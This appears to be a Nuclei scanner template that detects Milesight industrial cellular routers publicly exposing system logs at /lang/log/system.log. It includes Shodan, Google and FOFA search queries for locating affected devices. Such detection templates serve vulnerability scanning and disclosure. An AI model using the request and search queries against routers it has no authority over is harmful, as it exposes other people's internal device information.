id: milesight-system-log

info:
  name: Milesight Industrial Cellular Routers - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security discovered that it was publicly disclosing system logs, which included internal information.
  reference:
    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:rt_title
    google-query: '"/lang/log/system" ext:log'
    product: ur5x_firmware
    vendor: milesight
    fofa-query: body=rt_title
  tags: milesight,log,exposure

http:
  - method: GET
    path:
      - '{{BaseURL}}/lang/log/system.log'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'daemon.info'
          - 'authpriv.info'
        condition: and

      - type: word
        part: header
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cd84cb4c415fe5bcbe03a74e3ddeab4012b9d6e7bc8ecadf30eaf716d6299abe022079aa659394ab9218f8bc5adbc77a037bd45530b6f7342a3bea576324acd3b4b5:922c64590222798bb761d5b6d8e72950